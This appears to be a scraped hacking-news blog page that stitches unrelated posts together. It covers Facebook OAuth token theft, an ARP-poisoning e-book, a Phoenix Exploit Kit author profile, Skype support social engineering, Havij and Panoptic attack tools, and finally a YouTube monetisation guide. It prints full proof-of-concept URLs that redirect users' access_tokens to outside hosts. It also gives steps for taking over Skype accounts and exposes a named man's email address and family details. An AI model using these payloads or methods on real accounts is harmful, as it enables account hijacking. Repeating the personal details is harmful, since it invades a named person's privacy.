URL REDIRECTION FLAW IN FACEBOOK APPS PUSH OAUTH VULNERABILITY BACK IN ACTION

In earlier posts, our Facebook hacker 'Nir Goldshlager' exposed two serious Facebook oAuth Flaws. One, Hacking a Facebook account even without the user installing an application on their account and second, various ways to bypassing the regex protection in Facebook OAuth.

This time, Nir illustrated a scenario attack "what happens when a application is installed on the victim’s account and how an attacker can manipulate it so easily" According to hacker, if the victim has an installed application like Skype or Dropbox, still hacker is able to take control over their accounts.

For this, an attacker required only a url redirection or cross site scripting vulnerability on the Facebook owner app domain i.e in this scenario we are talking about skype facebook app. In many bug bounty programs URL redirection is not considered as an valid vulnerability for reward i.e Google Bug bounty Program.

Nir also demonstrated that an attacker is even able to gain knowledge of which application theirvictims are using. Example url : https://www.facebook.com/ajax/browser/dialog/friends_using_app/?app_id=260273468396&__asyncDialog=2&__a=1&__req=m

Because Facebook applications are developed by 3rd Party developers, who actually own the app, so facebook was helpless when to fix such potentially pernicious site redirection attacks.

Continuing hacking method used in last two oAuth flaws (mentioned here), this time attack is trying to use app redirection flaw in “redirect_uri, next” parameter to steal the access_token of facebook users.

POC (Using Skype app) : https://www.facebook.com/dialog/permissions.request?app_id=260273468396&display=page&next=http://metrics.skype.com/b/ss/skypeglobalmobile/5.4/REDIR/?url=http://files.nirgoldshlager.com&response_type=token&fbconnect=1

POC (Using Dropbox app) : https://www.facebook.com/dialog/permissions.request?app_id=210019893730&display=page&next=https://www.dropbox.com/u/68182951/redirect3.html&response_type=token&perms=email&fbconnect=1

The purpose of the hacker is just to steal the victim’s access_token through the use of Facebook OAuth flaws, so that he can take full control over victim's account remotely without knowing their passwords.

ANOTHER WAY TO HACK FACEBOOK ACCOUNTS USING OAUTH VULNERABILITY

In recent few months White hat hacker Nir Goldshlager reported many critical bugs in Facebook OAuth mechanism, that allowed an attacker to hijack any Facebook account without user's interaction.

Another hacker 'Amine Cherrai' reported a new Facebook OAuth flaw, whose explotation is actually very similar to Nir Goldshlager's findings but with a new un-patched way.

Now, if you are aware about the vulnerability used against Facebook OAuth in redirect_url parameter in the URL, there is another way that Amine Cherrai found, to bypass the patch applied by Facebook security team.

He found another file on Facebook, that allow redirection to steal access_token of victim's accounts.

i.e http://facebook.com/connect/xd_arbiter.php?#&origin=http://facebook.com/”

Successful explotation once again allowed hacker to hijack Facebook accounts using OAuth Flaw.

Proof of concept:

http://facebook.com/dialog/oauth?client_id=350685531728&response_type=token&display=page&redirect_uri=http%3A%2F%2Ftouch.facebook.com%2Fconnect%2Fxd_arbiter.php%3F%23%21%2Fapps%2Fmidnighthack%2F%3F%26origin%3Dhttp%3A%2F%2Ffacebook.com%2F

LEARN HOW TO HACK FACEBOOK ACCOUNTS VIA ARP POISONING

Compromising Facebook Account Via ARP Poisoning is e-Book written By Deep, this book will explain “ARP Poisoning Attack” or “Man in the Middle Attack”… In this book we use a packet sniffer called “Wireshark” to capture the packets ie coockie. Here we will see how Wireshark sniffs the packets and finally captured facebook’s authentication coockie and replaced the victims authentication coockie with our own authentication coockie allow us to compromise a facebook account easily. In this book/white paper we will see how we can hack a facebook account over a LAN with ARP Poisoning or MitMA

DOWNLOAD : http://adf.ly/NhVGi

HUNTING RUSSIAN MALWARE AUTHOR BEHIND PHOENIX EXPLOIT KIT

Exploit kits are one of the dangerous cyber crime tool, where The Phoenix Exploit Kit is a good example of exploit packs used to exploit vulnerable software on the computers of unsuspecting Internet users.

The Phoenix Exploit Kit is available for a base price of $2,200 in underground market by its malware author or developer. Like other exploit kits, Phoenix also developed to exploit browser-based vulnerabilities in outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader.

Developer of Phoenix is known by nickname AlexUdakov on several forums. According to new investigation report published by krebsonsecurity, AlexUdakov was also member of a forum calledDarkode, whose administrator accounts were compromised few weeks before and that the intruders were able to gain access to private communications of the administrators.

Intruders was able to view full profiles and database of Darkode members, as well as the private email addresses of Darkode members, where AlexUdakov was using the address “nrew89@gmail.com”.

On further investigation by authorities, they found Andrey Anatolevich Alexandrov, a 23-year-old male (born May 20, 1989) from Yoshkar-Ola profiled on russian social media site 'Vkontakte' with same email address. Currently he is living in a 365-square foot apartment with his wife and small child in Yoshkar-Ola.

Also he is member of many Russian language forums and web sites dedicated to discussing guns, including talk.guns.ru and popgun.ru.Investigators also found him on another criminal website exploit.in, where he had been selling Phoenix Exploit Kit for many months, until around July 2012, but after that till Feb 2013 his account remained silent.

In latest post on the same forum he explained his kit and gun clients that he was arrest by the Federal Security Service (FSB), the Russian agency for distributing malware and the illegal possession of firearms, including two AKS-74U assault rifles, a Glock, a TT (Russian-made pistol), and a PM (also known as a Makarov).

Not proved that Andrey Anatolevich Alexandrov is really behind devlopment of Phoenix Exploit Kit or not, but investigation can help authroities now to reach original criminal soon.

Anyway, users are advised to always ensure that the applications installed on their computers are kept up-to-date so they can avoid possible exploit attacks.

SOCIAL ENGINEERING SKYPE SUPPORT TEAM TO HACK ANY ACCOUNT INSTANTLY

You can install the industry’s strongest and most expensive firewall. You can educate employees about basic security procedures and the importance of choosing strong passwords. You can even lock-down the server room, but how do you protect a company from the threat of social engineering attacks?

For any of you that are involved in security awareness efforts, you know what I am talking about. It could happen tomorrow, it could happen today or it might already have happened.

In a recent disclosure posted by renowned hacker and developer DarkCoderSc (Jean-Pierre LESUEUR) explained that how one can easily Socially Engineer Microsoft Skype Support team to get access to any skype account.

From a social engineering perspective, employees are the weak link in the chain of security measures in place. He simply used the weakness of Skype password recovery system itself.

One simply need to request a new password to Skype support and asking to change the password. After the initial step one needs to proof the real ownership of the account requested. You must give 5 contacts accounts to the support desk.

"That’s easy because you just have to add 5 fake temporary accounts to the target account and its done. Another option is to simply ask the target what people he know on Skype. That option wasn't that hard because I have over 1000 contacts." he suggests the trick.

Within few seconds attacker can become owner of any victim account by proving very basic information to support team.

"Also Microsoft’s Support Team should make a serious effort to communicate better to their customers. At the moment they do not seem to care that much about their customers."

Social engineering is the act of manipulating a person into gaining access or sensitive data by preying on basic human psychology. Still, There is no patch for human stupidity!

HAVIJ SQL INJECTION- by SHINE SREEDHAR

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.

PANOPTIC - PENETRATION TESTING TOOL FOR HUNTING LFI VULNERABILITIES

Panoptic is a tool that searches for commonly known files through LFI vulnerabilities. Local file inclusion is a vulnerability that allows the attacker to read files that are stored locally through the web application.This happens because the code of the application does not properly sanitize the include() function. To get started, you will need Python 2.6+. Panoptic display the found file paths and it can save the actual files as well. You can download Panoptic here.

How To Make Money On YouTube

However, the process of becoming a YouTube partner is not as trivial as becoming an AdSense publisher. Below you’ll find the basic steps you need to go through:

1. Make Sure You Have an AdSense Account

      While the process to be able to display ads on your YouTube videos is a separate one, your earnings and stats will go together with your AdSense account, so you need to have one.
     In theory you could apply to become a YouTube partner before having an AdSense account, and in case you get accepted you would then follow up with an AdSense application. I believe the other way around is much simpler, though.

2. Grow Your Audience on YouTube

       One of the most important criteria the YouTube guys will use to evaluate your application is the audience you reach on YouTube. They don’t reveal what are the requirements, but I’ve seen many people say these are the ballpark numbers you need to have before getting accepted:

• at least 1,000 subscribers
• at least 1,000 views on all your videos
• at least 10,000 channel views

      These are the very minimum though, if you want to make sure you’ll get accepted I would aim for 5,000 subscribers, 50,000 channel views and over 1,000,000 upload views total.

3. Get Videos Out There Regularly

      If you only have one or two videos uploaded your chances of getting accepted are low, even if those videos went viral. That’s because YouTube is looking for people who are planning to work with them over the long term.

    The more regularly and frequently you upload new videos, the better. For instance, someone who uploads a new video every day will have a better chance of getting accepted than someone who uploads one every couple of weeks.

     You also want to make sure you have at least 100 uploaded videos before applying to become a partner (though some people say 50 will be enough).

4. Develop A Brand Around Your Videos

    This step is not essential, but I think it helps a lot on getting approve. You need to remember that, once you meet the technical guidelines, it will be a person on the other site deciding on whether you are a good fit for becoming a YouTube Partner or not. In other words, the more professional you look the higher your chances.

Practical tips include:

• Create a website to host your videos and give your audience more wayts to interact
• Create a nice logo and use it everywhere
• Use a watermark on your videos with your logo
• Consider getting a professional intro made for your videos
• Customize your YouTube channel to make it look professional

5. Make Sure Your Content Has Zero Copyrighted Material

       If there’s one thing that will get your application rejected on the spot is copyright infringement, so make sure you have zero copyrighted material on your videos.

       This includes images, graphics, logos, video clips and audio. For instance, even just using a music on the background which you don’t have permission to could get your application rejected.

6. Apply to Become a YouTube Partner

     After you followed all the previous steps you are ready to apply. You can do that via the official YouTube Partner Program page. It might take a while to get your application considered due to the load of people applying, but once you get accepted you’ll be able to start displaying ads on your videos right away.